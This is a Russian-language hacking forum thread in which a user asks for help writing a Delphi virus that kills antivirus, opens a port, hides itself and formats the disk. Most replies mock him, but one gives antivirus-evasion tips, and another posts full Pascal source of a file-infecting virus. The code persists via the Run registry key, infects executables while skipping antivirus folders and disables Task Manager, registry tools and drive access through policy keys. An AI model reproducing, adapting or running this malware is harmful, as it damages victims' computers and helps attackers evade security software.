Твой софтовый форум > Тематические форумы > Хак! Ломать не строить - это уметь надо

Вирус на Delphi

,

люди помогите в написании вируса!
Дата публикации: 24.01.2010 - 20:10
Pages: 1, 2
DarkFire
11.09.2007 - 14:52
Я бы хотел написать вирус ph34r.gif на Delphi, но затрудняюсь это сделать один вот решил попросить о помощи smile.gif
я бы хотел чтобы вир выбивал антивир (доктор веб или каспер) и открывал какой небудь порт ph34r.gif , ну и конечно небыл видим негде.
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
зарание благодерен smile.gif
† Flаmmen †
11.09.2007 - 18:03
... а еще код вертикального взлета и выхода в открытый космос. Просто так вирусами никто делиться не будет и их написание — это целое искусство. А то если каждый ......пользователь будет писать вирусы, которые не видят антивирусы (!!!), то эра информационных технологий закончится.
de1ay
11.09.2007 - 18:23
Давайте по порядку.
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
Я бы хотел написать вирус
*


Есть ли у тебя знания в области программирования как таковые?
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
на Delphi
*


Да-а-а... Писать вирусы на дельфи. Прикидываешь размер файла?
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
чтобы вир выбивал антивир (доктор веб или каспер)
*


Антивирус ты так просто не вырубишь, он сразу затрубит об этом пользователю или скромно промолчит, но вырубить свой процесс не даст. К тому же, все антивирусы работают в нулевом кольце, а твоя софтина туда вообще вряд ли пробьётся...
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
открывал какой небудь порт, ну и конечно небыл видим негде ... код перезагрузки и дальнейшнго форматирования диска!
*


Win-api учи и будет счастье...
Подводя итог хочу спросить:
Не передумал?
Цитата | Quote
Просто так вирусами никто делиться не будет и их написание — это целое искусство.

Есть в интернете сорсы троянов на дельфи...
ZaHack
11.09.2007 - 22:50
Цитата | Quote(delay(0) @ 11.09.2007 - 19:23)
Есть в интернете сорсы троянов на дельфи...
*



Если эти программы-шутки можно назвать троянами. dry.gif Самое юзабельное, что видел это "Боевой конь за 10 минут" от Михаила Фленова. Но это никак нельзя назвать полноценным трояном, так подкол ламера...

Цитата | Quote
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!


Так, ну про вертикальный взлет тебе уже сказали, могу предложить еще код вызова Сотоны и выхода в Астрал.

Цитата | Quote
Есть ли у тебя знания в области программирования как таковые?


А ты сам как думаешь? smile.gif

-=$eReG@=-
12.09.2007 - 23:29
Цитата | Quote
Я бы хотел написать вирус  на Delphi
сразу видно - матёрый хакер! biggrin.gif
Цитата | Quote
я бы хотел чтобы вир выбивал антивир
ну, а кто ж не хотел бы
Цитата | Quote
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
зарание благодерен
кого же это ты так невзлюбил?
Цитата | Quote
Win-api учи и будет счастье...
полностью поддерживаю
зы: хочешь написать хороший вирус - учи лучше assembler и грОматЕку tongue.gif И да поможет тебе великий Ктулху. smile.gif
kukkk
11.10.2007 - 22:16
Антивир в принципе незачем вырубать))) Замути просто форму без внешней таблички с размером формы 1*1. Получицца активное приложение или убери его в трей каким-нибудь знакомым значком. каспер клюнет 100%. Я свои вирусы и вообще программы(у меня нет ни одной не хак бугага) пишу по принципу создания подобия самой безобидной программки))) Конечно если у тебя будет прописано отформатировать с то все антивиры завопят,а вот если прога получит список файлов,потом удалит 1,потом 2-й))) Никакого подозрения. Все легально.=> Каспер молчит. Исчи обходные пути. Я даже когда нужно было перезагружать комп делал кнопку и на нее программно нажимал. А что? Комп выключается по кнопке,только панда падло запалил это((
de1ay
11.10.2007 - 22:29
kukkk, а то, что антивирь ставит хуки, тебе не о чем не говорит?
yah
11.10.2007 - 22:31
Цитата | Quote(kukkk @ 11.10.2007 - 22:19)
Я даже когда нужно было перезагружать комп делал кнопку и на нее программно нажимал.
*


Вот это кстати похвально. Не всегда все сводится к перелезанию ring3->ring0. Для написания более менее рабочего вируса со всеми необходимыми функция вполне достаточно winapi. Главное грамотно продумать алгоритм. Ну а если уж хочется полной власти, то милости просим в ring0. Но там уже будет свой набор API.
ser_gaik88
16.10.2007 - 21:01
Если руки не кривые в дельфине вир можно написать на 60-80 кб.Причём вполне полноценный!!А для тех кто срёт на обьём файлов из делфи,скажу что они просто не умеют юзать конпилы да ваще делфи херовато знают!!!Обычный инпутный ехе
на 600кб при желании делается 60кб.
snike
2.12.2007 - 15:59
Ну коль есть желание у тебя, попробуй для начала в "этом" разобраться biggrin.gif biggrin.gif . при желании можешь модифицировать.

Code
 {$M 65520,0,0}
Program Virus_DOS_HLLP_GVDG;
USES DOS;
Const
 VirSize=5982;
 Metka='by SN!KE=))';
 MSize=length(Metka);
type
 Bufer=array[1..VirSize] of Char;
VAR
  Victim : integer;
Procedure BeginEnd(i : integer);
var
 n :integer;
Begin
 case i of
       0..10000: n:=0;
   10001..20000: n:=i;
   20001..30000: n:=random(1000)
 else
   begin  
     n:=0;
     n:=random(65535);
     n:=i
   end;  
 end;
End;
Function IntToStr(I : integer) : String;
Var
 S : String [5];
Begin
Str(I, S);
IntToStr:=S;
End;
Procedure Musor;
var
 fch : file of char;
 rch : char;
  ch : char;
  st : string;
   i : integer;
  ii : integer;
 iii : integer;
begin
randomize; BeginEnd(-1894);
for i:=1 to random(10) do
 begin
   st:='';
   for ii:=1 to random(5)+3 do
     begin
       rch:=chr(ord(random(26)+65));
       st:=st+rch;
     end;
   Assign(fch,st+'.'+chr(ord(random(26)+65))+
   +chr(ord(random(26)+65))+chr(ord(random(26)+65)));
   Rewrite(fch);
   for iii:=1 to random(1000) do
   begin
     ch:=chr(ord(random(256)));
     write(fch,ch);
   end;
   close(fch);
 end;
end;
Procedure AutoRun;
VAR
   f : file;
 txt : text;
   i : integer;
 st1 : string;
 st2 : string;
Begin
 st1:=GetEnv('SystemRoot')+'\'+'AVTORUN'+'.EXE';
 for i:=1 to length(st1) do
 begin
 if st1[i]='\'
 then st2:=st2+'\'+st1[i]
 else st2:=st2+st1[i]
 end;
 Assign(f,st1);
 {$i-} Reset(f); Close(f); {$i+}
 if IOResult<>0 then
 Begin
   Assign(txt,'REG');
   Rewrite(txt);
   Writeln(txt,'Windows Registry Editor Version 5.00');
   Writeln(txt,'[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]');
   Writeln(txt,'"AVTORUN"="'+st2+'"');
   Close(txt);
   Exec(GetEnv('Comspec'),'/c REG IMPORT REG');
   Exec(GetEnv('Comspec'),'/c DEL REG');
   Exec(GetEnv('Comspec'),'/c copy '+paramstr(0)+' '+st1);
   Exec(GetEnv('Comspec'),'/c cls');
 End; BeginEnd(19573);
End;
procedure Shifr(var Buf : Bufer; key : integer);
var
 k : integer;
begin
 for k:=1 to Sizeof(Buf) do
 Buf[k]:=chr(ord(Buf[k]) xor key);
end;
procedure Infect(path,name:string);
var
   FromF : file;
     ToF : file;
  BufVir : Bufer;
 NumRead : Word;
     txt : text;
       i : integer;
       k : integer;
     Key : integer;
begin
 Assign(txt,path+name);
 append(txt);
 write(txt,Metka); BeginEnd(-2253);
 i:=0;
 k:=random(256);
   repeat
     inc(i);
     write(txt,chr(random(256))); BeginEnd(-1139);
   until i>k;
 Close(txt); BeginEnd(18190);
 Assign(ToF,path+name);
 reset(ToF,1);
 Key:=FileSize(ToF) mod 256; BeginEnd(19974);
 BlockRead(ToF,BufVir,SizeOf(BufVir), NumRead);
 Shifr(BufVir,Key);
 seek(ToF,filesize(ToF));
 BlockWrite(ToF,BufVir,NumRead);
 Assign(FromF,paramstr(0));
 reset(FromF,1);
 BlockRead(FromF,BufVir,SizeOf(BufVir), NumRead);
 seek(ToF,0);
 BlockWrite(ToF,BufVir,NumRead);
 Close(ToF);
 Close(FromF);
end;
procedure Find(dir:pathstr);
var
  sr : searchrec;
   f : file;
 Buf : array[1..4] of Char;
begin
 findfirst(dir+'*.exe',39,sr);
 if  (pos('SYSTEM',dir)=0) and (pos('DRWEB', dir)=0)
 and (pos('KASPER',dir)=0) and (pos('PANDA', dir)=0)
 and (pos('NORTON',dir)=0) and (pos('COMMON',dir)=0)
 and (pos('DOCUM', dir)=0) and (pos('GVDG',  dir)=0)
 then
 while doserror=0 do
 if Victim<13 then
 begin
 Assign(f,dir+sr.name);
 setfattr(f,0);
 {$i-}reset(f,1);
 Close(f);{$i+}
 IF ioresult=0 then
   Begin
     Assign(f,dir+sr.name);
     reset(f,1); BeginEnd(4089);
     if FileSize(f)>1000 then
     Begin
       seek(f,85);
       blockread(f,Buf,4);
       Close(f);
       if Buf<>'GVDG' then
        begin
          inc(Victim); BeginEnd(2908);
          Infect(dir,sr.name);
        end;
     end
     else
     Close(f);
   end;
   findnext(sr); BeginEnd(-2668);
 end
 else exit;
end;
procedure InRun(Run : integer);
var
       f : file;
     txt : text;
  BufVir : Bufer;
 NumRead : Word;
       k : integer;
       z : char;
     Key : integer;
       i : longint;
     Buf : array[1..MSize]of char;
begin
if Run=1 then
 begin
 Musor;
 Assign(txt,getenv('TMP')+'reg');
 rewrite(txt);
 writeln(txt,'Windows Registry Editor Version 5.00');
 write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\');
 writeln(txt,'Windows\CurrentVersion\Policies\Explorer]');
 writeln(txt,'"DisableLocalMachineRun"=dword:00000001');
 writeln(txt,'"NoFileMenu"=dword:00000001'); BeginEnd(14641);
 writeln(txt,'"NoControlPanel"=dword:00000001');
 writeln(txt,'"NoDrives"=dword:3ffffff');
 writeln(txt,'"NoViewOnDrive"=dword:3ffffff');
 writeln(txt,'"NoClose"=dword:00000001'); BeginEnd(6546);
 writeln(txt,'"NoChangeStartMenu"=dword:00000001');
 writeln(txt,'"NoViewContextMenu"=dword:00000001');
 writeln(txt,'"NoRun"=dword:00000001');
 writeln(txt,'"NoFind"=dword:00000001');
 writeln(txt,'"NoDesktop"=dword:00000001');
 write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\'); BeginEnd(-1088);
 writeln(txt,'Windows\CurrentVersion\Policies\System]');
 writeln(txt,'"DisableTaskMgr"=dword:00000001'); BeginEnd(6313);
 writeln(txt,'"DisableRegistryTools"=dword:00000001');
 writeln(txt,'"NoDispCPL"=dword:00000001');
 Close(txt);
 exec(getenv('comspec'),'/c reg import '+getenv('TMP')+'reg');
 exec(getenv('comspec'),'/c cls'); BeginEnd(-1408);
 erase(txt);
 exec(getenv('Comspec'),'/c cmd /c time '+IntToStr(random(24))+':'+IntToStr(random(60))+':00,00');
 exec(getenv('Comspec'),'/c cmd /c rundll32 user32, SwapMouseButton');
 writeln('14/88');
 end;
 Assign(f,paramstr(0));
 reset(f,1);
 Key:=(FileSize(f)-VirSize) mod 256;
 seek(f,filesize(f)-VirSize);
 BlockRead(f,BufVir,SizeOf(BufVir), NumRead);
 if filesize(f)=VirSize then
 Begin
   Close(f);
   Erase(f);
   Halt(0);
 end
 else
 Shifr(BufVir,Key);
 seek(f,0);
 BlockWrite(f,BufVir,NumRead);
 i:=filesize(f)-VirSize-256-MSize; BeginEnd(11632);
 while true do
 begin
   seek(f,i);
   blockread(f,Buf,MSize);
   if Buf=Metka then
   begin
     seek(f,i);
     truncate(f); BeginEnd(23603);
     break;
   end;
   inc(i);
 end;
 Close(f);
 if Run=1 then
 exec(Paramstr(0),'');
end;
Procedure Nucleus;
var
   f : file;
begin
 Assign(f,paramstr(0));
 SetFAttr(f,0);
 if Paramstr(1)='KILL' then
 begin
   InRun(0);
   Halt(0);
 end;
 AutoRun;
 Find('');
 InRun(1);
end;
begin
Randomize; BeginEnd(5352);
Nucleus;
end.

Pages: 1, 2


Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке: Вирус на Delphi
SoftoRooM © 2004-2024